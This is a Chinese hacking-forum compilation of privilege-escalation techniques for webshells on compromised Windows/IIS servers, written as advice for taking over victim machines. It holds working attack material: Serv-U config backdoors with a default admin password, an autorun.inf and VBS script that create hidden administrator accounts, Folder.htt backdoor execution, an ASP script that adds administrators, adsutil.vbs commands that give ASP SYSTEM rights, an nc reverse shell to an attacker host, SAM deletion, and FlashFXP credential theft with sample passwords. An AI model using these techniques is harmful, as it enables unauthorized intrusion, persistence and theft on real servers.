WEBSHELL提权大全
作者:admin 日期:2006-12-24 05:39
WEBSHELL权限提升技巧
c: d: e:.....
C:Documents and SettingsAll Users「开始」菜单\程序
看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,
C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere
看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆
c:Program Filesserv-u
C:WINNTsystem32config
下它的SAM,破解密码
c:winntsystem32inetsrvdata
是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
c:prel
C:Program FilesJava Web Start
c:Documents and Settings
C:Documents and SettingsAll Users
c:winntsystem32inetsrvdata
c:Program Files
c:Program Filesserv-u
C:Program FilesMicrosoft SQL Server
c:Temp
c:mysql(如果服务器支持PHP)
c:PHP(如果服务器支持PHP)
运行"cscript C:InetpubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps"来提升权限
还可以用这段代码试提升,好象不是很理想的
如果主机设置很变态,可以试下在c:Documents and SettingsAll Users「开始」菜单\程序启动"写入bat,vbs等木马。
根目录下隐藏autorun.inf
C:PROGRAM FILESKV2004 绑
D:PROGRAM FILESRISINGRAV
C:Program FilesRealRealServer
rar
Folder.htt与desktop.ini
将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下
replace 替换法 捆绑
脚本 编写一个启动/关机脚本 重起
删SAM :( 错
CAcls命令
FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak
Ring的权限提升21大法!
以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过
的。本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。希望对朋友有帮助!
1.radmin连接法
条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去
。本人从来米成功过。,端口到是给对方打开了。
2.paanywhere
C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 这里下他的GIF
文件,在本地安装pcanywhere上去
3.SAM破解
C:WINNTsystem32config 下他的SAM 破解之
4.SU密码夺取
C:Documents and SettingsAll Users「开始」菜单\程序
引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:
TimeOut=600
Maintenance=System
Access1=C:|RWAMELCDP
Access1=d:|RWAMELCDP
Access1=f:|RWAMELCDP
SKEYvalues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
5.c:winntsystem32inetsrvdata
引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,
然后执行
6.SU溢出提权
这个网上教程N多 不详细讲解了
7.运行Csript
引用:运行"cscript C:InetpubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps"来提
升权限
用这个cscript C:InetpubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:winntsystem32inetsrvasp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll"
"C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll"
"C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32
inetsrvasp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了 8.脚本提权
c:Documents and SettingsAll Users「开始」菜单\程序启动"写入bat,vbs
9.VNC
这个是小花的文章 HOHO
默认情况下VNC密码存放在HKCUSoftwareORLWinVNC3Password
我们可以用vncx4
破解它,vncx4使用很简单,只要在命令行下输入
c:>vncx4 -W
然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
10.NC提权
给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了
11.社会工程学之GUEST提权
很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮
箱号 手机号 尽量看看 HOHO
12.IPC空连接
如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令
13.替换服务
这个不用说了吧?个人感觉相当复杂
14.autorun .inf
autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信
他不运行
15.desktop.ini与Folder.htt
引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择"自定义
文件夹"(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder
setting的文件架与desktop.ini的文件,(如果你看不到,先取消"隐藏受保护的操作系统文件")然后
我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码: ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后门文件名">
然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方
任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门
16.su覆盖提权
本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重
起一下Serv-U,于是你上面的所有配置都与他的一模一样了
17.SU转发端口
43958这个是 Serv -U 的本地管理端口。FPIPE.exe上传他,执行命令: Fpipe –v –l 3333 –r
43958 127.0.0.1 意思是将4444端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个
服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的
Serv-u了
18.SQL帐户密码泄露
如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的
ASP文件中看到),因为MSSQL是默认的SYSTEM权限。
引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass
中填入你所得到的用户名与密码。format选择xp_cmdshell"%s"即可。然后点击connect,连接上后就可
以在CMD一栏中输入你想要的CMD命令了
19.asp.dll
引用:因为asp.dll是放在c:winntsystem32inetsrvasp.dll (不同的机子放的位置不一定相同
)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll"
"C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll"
"C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32
inetsrvasp.dll"
好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去
了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到
C:InetpubAdminScripts>这个目录下.
那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把
asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.
20.Magic Winmail
前提是你要有个webshell 引用:http://www.eviloctal.com/forum/read.php?tid=3587这里去看吧
21.DBO……
其实 提升权限的方式很多的 就看大家怎么利用了 HOHO 加油吧 将服务器控制到底!
感谢noangel
WEBSHELL权限提升
动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容
OK,进入我的WEBSHELL
啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊
输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望了
一 serv-u提升
OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,记得有次看到SERV-U有默认的用户名和密码,但是监听的端口是43958,而且是只有本地才能访问的,但是我们有端口转发工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21
显示竟然是3.0的,唉,不得不说这个管理员真的不称职。后来完毕后扫描了下,也只有FTP的洞没有补。既然是这样,我们就开始我们的提升权限了
上传FPIPE,端口转发工具, 图三
在运行CMD命令里输入d:\wwwroot\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本机的43598端口转发到81端口
然后打开我们自己机子上的SERV-U,点Serv-U服务器,点菜单栏上的的服务器,点新建服务器,然后输入IP,输入端口,记得端口是刚刚我们转发的 81端口。服务名称随便你喜欢,怎么样都行。然后是用户名:LocalAdministrator 密码:#l@$ak#.lk;0@P (密码都是字母)
确定,然后点刚刚建的服务器,然后就可以看到已有的用户,自己新建一个用户,把所有权限加上。也不锁定根目录
接下来就是登陆了,登陆FTP一定要在CMD下登陆,
进入后一般命令和DOS一样,添加用户的时候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
如果对方开了3389的话,就不用我教你怎么做了,没开的话,新建立IPC连接,在上传木马或者是开启3389的工具
二
auto.ini 加 SHELL.VBS
autorun.inf
[autorun]
open=shell.vbs
shell.vbs
dim wsh
set wsh=createObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序,还要一个木马程序,但是语句就和最后两句一样,通过CMD执行木马程序
三
Folder.htt与desktop.ini
将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下,觉得一个不够,可以多放几个
Folder.htt添加代码
但是后门和这两个文件必须要放到一块,有点问题,可以结合启动VBS,运行结束后,删除上传的后门.就是CODEBASE="shell.vbs".shell写法如上
四
replace
替换法,可以替换正在执行的文件。用这个几乎可以马上得到权限,但是我没有做过试验,可以试下,将对方正在执行的文件替换为和它文件名一样的,捆绑了木马的。为什么不直接替换木马呢?如果替换的是关键程序,那不是就直接挂了?所以还是捆绑好点
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A]
[/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2]
[/R] [/S] [/W]
[drive1:][path1]filename 指定源文件。
[drive2:][path2] 指定要替换文件的
目录。
/A 把新文件加入目标目录。不能和
/S 或 /U 命令行开关搭配使用。
/P 替换文件或加入源文件之前会先提示您
进行确认。
/R 替换只读文件以及未受保护的
文件。
/S 替换目标目录中所有子目录的文件。
不能与 /A 命令选项
搭配使用。
/W 等您插入磁盘以后再运行。
/U 只会替换或更新比源文件日期早的文件。
不能与 /A 命令行开关搭配使用
这个命令没有试验过,看能不能替换不能访问的文件夹下的文件,大家可以试验下
五
脚本
编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。内容如下:
[Startup]
0CmdLine=a.bat
0Parameters=
将文件scripts.ini保存到"C:\winnt\system32\GroupPolicy\Machine\Scripts"
A.BAT的内容可以是NET USER yonghu mima
也可以是NET USER ADMINistrator XXX
这样可以恢复你想要得任意用户名的密码,也可以自己增加新的用户,但是要依赖重启,还有就是对SYSTEM32有写的权限
六
SAM
如果可以访问对方的SYSTEM32的话,删除对方的SAM文件,等他重启以后就是ADMIN用户密码为空
突然又有了想法,可以用REPLACE命令替换的吗,可以把你的SAM文件提取出来,上传到他的任意目录下,然后替换。不过不知道如果对SYSTEM32没有权限访问的话,能不能实现替换
--------------------------------------------------------------------------------
--
--
使用FlashFXP来提升权限 最近各位一定得到不少肉鸡吧:),从前段时间的动网的upfile漏洞, 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎,大家的方法也不过是使用一下asp脚本的后门罢了。至于提 升权限的问题呵呵,很少有人能作一口气完成。关键还是在提升权限上做个问题上,不少服务器设置的很BT,你的asp木马可能都用不了,还那里来的提升啊。我们得到webshell也就是个低级别的用户的权限,各种提升权限方法是可谓五花八门啊,如何提升就看你自己的妙 招了。
其一,如果服务器上有装了pcanywhere服务端,管理员为了便于管理也给了我们方便,到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。
其二,如果对方有Serv-U大家不要骂我啊,通过修改ServUDaemon.ini和fpipe这软件提升权限应该是不成问 题吧。
其三,通过替换系统服务来提升。
其四,查找conn和config这类型的文件看能否得到sa或者mysql的相关密码,可能会有所收获等等。
本人在一次无聊的入侵过程中发现了这个方法,使用Flashfxp也能提升权限,但是成功率高不高就看你自己的运气了:)
本人www.xxx.com 通过bbs得到了一个webshell,放了个小马(现在海阳的名气太大了偶不敢放),而且已经将一段代码插入了N个文件中,够黑吧。提升权限没时间做。在我放假回家后,一看我晕bbs升级到动网sp2了我放的小马也被K了,人家的BBS是access版本的。郁闷啊!突然想起我将一个页面插入了asp的后门,看看还有没有希望了。输www.xxx.com/xx.asp?id =1 好家伙,还在!高兴ing
图1
于是上传了一个asp的脚本的后门,怎么提升权限呢?
在这个网站的主机上游荡了N分钟,在C:\ Program Files下发现了FlashFXP文件夹(跟我一样使用这个软件自己心里暗想)图2,于是就打了了Sites. dat这个文件(编辑)这是什么东西密码和用户名,而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件会怎么样呢?
于是我就将Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。打开flashfxp 在站点中打开站点管理器一项。乖 乖发财了
对方管理员通过flashfxp连接的各个站点都在图3,点击连接。通过了于是我们又有了一堆肉鸡,我们有ftp权限。上传脚本 木马~ 呵呵。
说了半天这提升权限的事情一点没讲啊
不要急,大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。可惜啊!
又想起了在Sites.dat中也显示了密码和用户名,而且密码是加密的。
现在的星号密码会不会也是加了密的?看看就行了呗。
怎么看? 菜鸟了吧 手头有个不错的查看星号的软件,就是xp星号密码查看器,通过查看跟Sites.dat中加密了密码做比较。看图4和图5 的比较 很显然在站点管理器中查看到的密码是明文显示的。发财了吧
下一步就是使用xp星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码,还真有点怀念当年玩sniff的时光。呵呵
密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+
用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69
(上述部分密码和用户名已经作了必要的修改)
这么多的信息,按社会工程学的概念来说,没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到 的。
我想这个问题应该反馈到flashfxp官方,让他们在下个版本中修正这个漏洞或者说是错误。经过后来测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。希望大家在入侵的时候遇到fla shfxp的时候能想到这个方法,至少也可以得到一堆新的肉鸡。不防试试?希望能给大家渗透带来帮助。
--------------------------------------------------------------------------------
--
--
将asp权限提到最高by: cnqing from:http://friend.91eb.com
本来是要写个提权asp木马的,可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说说,说的太麻烦没有必要。懂了就行。
原理:
asp文件的教本解释是由asp.dll运行的。由dllhost.exe启动的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接启动。身份是system
方法:
第一步。
得到inprocesslsapiapps内容,用命令"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"。将得到的一组dll复制下来。
第二步
写一个bat内容为"cscript C:\Inetpub\AdminScripts\adsutil vbs set w3svc/inprpocessisapiapps "C:\Inetpub\AdminScripts\asp.dll" ·····
省略号为复制下的内容。中间用空格分开不要带回车符
最后运行这个bat就行了。
例如:
我用"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"得到
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\System32\msw3prt.dll"
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_aut\author.dll"
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_adm\admin.dll"
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\shtml.dll"
那么你的bat就应该是:
cscript C:\Inetpub\AdminScripts\adsutil vbs set w3svc/inprpocessisapiapps "C:\Inetpub\AdminScripts\asp.dll" "c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\System32\msw3prt.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_aut\author.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_adm\admin.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\shtml.dll"
已测试成功!!
--------------------------------------------------------------------------------
--
--
利用%5c绕过验证
利用%5c绕过验证
---------------------------------------
lake2(http://mrhupo.126.com)
2004-11-27
---------------------------------------
说到%5c,你是不是想起了当前流行的那个%5c暴库漏洞,呵呵,本文就是对%5c利用的探索(呵呵,当然有我提出的新东东,或许对你有帮助哦^_^)。
好,我们先追根溯源,找到那个漏洞的老底。看看绿盟2001年的漏洞公告:http://www.nsfocus.net/index.php?ac...iew&bug_id=1429
N 年以前利用这个漏洞可以实现目录遍历,虽然微软出了补丁,不过好像补丁是用来限制iis只能访问虚拟目录的,所以漏洞还是存在,只不过利用方式变了。对 iis来说,提交一个含有%5c的url能够找到文件,但是该文件里以相对路径引用的其他文件却找不到了(%5c是\的url编码,iis跳转到上一级目录去找,当然找不到;头晕了吧,哈哈,我也头晕啊)。
后来这个漏洞就被牛人挖掘出来了,也就是传说中的%5c暴库:由于连接数据库的文件引用的相对路径,提交%5c找不到文件,所以导致出错,iis就会老老实实的说出数据库的路径(不明白?找google)。
一个偶然的机会我发现还可以利用%5c绕过asp的验证;当我们暴库失败的时候不妨试试。
废话少说,看下面的代码:
<%
guest_user=trim(request("guest_user"))
guest_password=trim(request("guest_password"))
Set rs= Server.createObject("ADODB.Recordset")
sql="select * from admin where id=1"
rs.open sql,conn,3,2
readuser=rs("guest_user")
readpassword=rs("guest_password")
if readuser<>guest_user or readpassword<>guest_password then
response.write "请输入正确地管理员密码!"
response.end
else
session("admin")=1 '登陆后写入seesion中保存
response.write("登陆成功,请返回信息页")
end if
%>
看到没有,要想通过验证必须让数据库里的用户名密码与提交的一致;想到什么?让我们再看看数据库连接文件代码:
<%
on error resume next
set conn=server.createobject("adodb.connection")
DBPath = Server.MapPath("guestbook.asp")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
%>
啊,有容错语句不能暴库!等等,如果提交%5c数据库找不到,由于容错,所以程序会继续执行,那么说来从数据库得到的用户名密码皆为空(想想有时暴库失败是不是看到空空的框架,因为数据都是空嘛),哈哈,这样我们就绕过验证了!
知道怎么做了吧,把登陆页面保存到本地,修改提交的url,把最后一个/改成%5c,用户名密码用空格(有的程序会检查用户名密码是否为空,空格会被程序过滤),提交,就ok了。
诶,各位不要以为我自己没事写段代码来捣鼓,实际上这个是我们学校一个高手做的留言板程序,就挂在学校的主页,呵呵。
既然弄懂了原理,当然要找实际漏洞啦,自然是拿大名鼎鼎的"洞"网论坛开刀。不过失败了,因为它的数据库连接文件里有这么一段:
If Err Then
err.Clear
Set Conn = Nothing
Response.Write "数据库连接出错,请检查连接字串。"
Response.End
End If
数据库找不到程序就结束了,呵呵,空欢喜一场。
接着又去down了bbsxp论坛,打开数据库连接文件,晕,根本没有容错语句;呵呵,不过可以暴库哦。
我又不是BT,所以不去找事了,写篇文章,算是给各位高手提供资料吧。
总结一下这个攻击方法成功的条件:1、数据库连接用的相对路径且仅有简单的容错语句;2、服务器iis版本为4或5;3、程序里不检查空字符或者检查时不过滤空格而比较时过滤空格;4、程序不能在一级目录
至于防范,呵呵,既然攻击条件知道了,防范措施自然也出来了^_^
--------------------------------------------------------------------------------
--
--
添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]
作者:蓝屏,凯文 文章来源:冰点极限
其实上个礼拜我和凯文就在我的肉鸡上测试了,还有河马史诗.结果是在user权限下成功添加Administrators组的用户了(虽然我不敢相信我的眼睛).
上次凯文不发话,我不敢发布啊....现在在他的blog 上看到他发布了,就转来了咯(比我上次测试时还改进了一点,加了个表单).这下大家有福咯```
反正代码是对的,但是很少能成功,具体的看运气了。。呵呵,下一步我想把他整合到海洋里面去。嘿嘿。
.network对象脚本权限提升漏洞利用工具
<%@codepage=936
on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")<>"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
if err then
response.write "哎~~今天你还是别买6+1了……省下2元钱买瓶可乐也好……"
else
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登录")>0 then
response.write "虽然没有错误,但是好象也没建立成功.你一定很郁闷吧"
else
Response.write "OMG!"&username&"帐号居然成了!这可是未知漏洞啊.5,000,000RMB是你的了"
end if
end if
else
response.write "请输入输入用户名"
end if
end if
%>
如何绕过防火墙提升权限
本文讲的重点是webshell权限的提升和绕过防火墙,高手勿笑。
废话少说,咱们进入正题。
首先确定一下目标:http://www.sun***.com ,常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell,不是DVBBS,而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用 WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp,用过动鲨的door.exe的人都知道,这个是上传asp木马内容的。于是,上传海洋2005a,成功获得webshell。
测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死。没关系,再来检查一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。
思路:上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a那个上传的组件不好用(反正我总遇到这个问题),没关系,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹,up.htm是本地用的,修改up.htm里的链接地址为:http://www.sun***.com/lemon/upload.asp就可以上传了。
传上了srv.exe和nc.exe在H:\long\sun***\lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D: \Documents and Settings\All Users\是应该有运行权限的。于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死。
可以浏览D:\program files\serv-u\ServUDaemon.ini,不能改,难道要破解serv-u的密码,晕,不想。
不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FAT32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,那里99%是FAT32分区的。我们还遇到过装有Ghost的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是 FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copy srv.exe和nc.exe到c:\,运行 srv.exe "nc.exe–e cmd.exe 202.*.*.* 888",这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc –l –p 888。我们在学校内网里,没有公网ip,不爽-ing。
我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传 n次,错误n次,傻了n次,后来终于成功了。做黑客还真得有耐心和恒心。)
高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H:\long\sun***\lemon,再用刚才nc得到的 shell把它们copy到d:\winnt\system32\下,分别运行:r_server /install , net start r_server , r_server /pass:rain /save 。
一阵漫长的等待,终于显示成功了。兴冲冲用radmin连上去,发现连接失败。晕死,忘了有防火墙了。上传pslist和pskill上去,发现有backice,木马克星等。Kill掉他们虽然可以登陆,但服务器重启后还是不行,终不是长久之计呀。防火墙是不防21,80等端口的,于是,我们的思路又回到了serv-u上了。把他的 ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上添加一个用户名为xr,密码为rain的系统帐号,加上所有权限。再用老办法,上传,用shell写入D:\program files\serv-u\里,覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间,但是成功了,于是用flashfxp连上,发生 530错误。郁闷,怎么又失败了。(根据经验这样应该就可以了,但为什么不行没有想通,请高手指点。)
不管了,我们重启serv-u就ok 了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon 。把它kill了。然后再运行D:\program files\serv-u\ ServUAdmin.exe ,这里要注意不是ServUDaemon.exe 。
好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以:
ftp>quote site exec net user xr rain /add
在webshell上运行net user,就可以看见添加成功了。
整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit可以做到的,但是我们觉得系统自带的服务才是最安全的后门。
--------------------------------------------------------------------------------
--
--
asp.dll解析成system提升权限
网络上传统的提升asp权限为系统的有两种:
1.图形化下的,把默认站点---->主目录--->应用程序保护设置为低,这样就可以把asp权限设置为system.
但这种提升方法很容易被发现,所以网络有另一种一般是用adsutil.vbs来提升权限.而这个也是今天
我要谈的关于adsutil.vbs提升权限.
2.用adsutil.vbs搞定.
在网络上我看到了很多的教你用这种方法的动画,文章,但我至今没有看到一篇介绍原理的,下面我谈谈我个人的看法:
先举个例子:
有一群狗,这群狗里有几个长老级狗物,它们拥有着至高无上的权限,而其它的狗,他们的权限则少得可怜.
转到计算机上:
在IIS中,有几个Dll文件是拥有特权限的,我们可以理解为系统权限,就像长老级的狗.而解析asp的asp.dll则就像一只
普通的狗,他的权限少得可怜.
那么,如果asp.dll也成了长老级的狗的话,那么asp不也就有了系统权限了吗,这是可以成立的.所以我们的思路也就是
把asp.dll加入特权的dll一族之中.提升步骤为:
<1>先查看有特权一话有哪些.
<2>加asp.dll加入特权一族
好了,下面我们就来实践这个过程.
1)查看有特权的dll文件:
命令为:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps
得到显示为:
C:\Inetpub\AdminScripts>cscript adsutil.vbs get /W3SVC/InProcessIsapiApps
Microsoft (R) Windows 脚本宿主版本 5.1 for Windows
版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.
InProcessIsapiApps : (LIST) (5 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
看到没有,他说明的是有特权限一族为:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
这几个文件,不同的机子,可能会不同.
2)把asp.dll加入特权一族:
因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去
了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:\Inetpub\AdminScripts>这个目录下.
那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.
例:cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll"
这样就可以了,当你再用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 这个语句查之时,如果没有看见asp.dll,
说明,asp的权限又恢复到以前的权限.
--------------------------------------------------------------------------------
-- --
winNT/2000提升权限
Windows NT/2000 通用的提升方法
攻击者在获得系统一定的访问权限后通常要把自己的权限提升到管理员组,这样攻击者就控制了该计算机系统。这主要有以下几种方法:1.获得管理员密码,下次就可以用该密码进入系统; 2. 先新建一个用户,然后把这个普通添加到管理员组,或者干脆直接把一个不起眼的用户如guest 添加到管理员组; 3. 安装后门。
本文简要介绍在 Windows NT4和 Windows 2000 里攻击者常用的提升权限的方法。下面是具体方法:
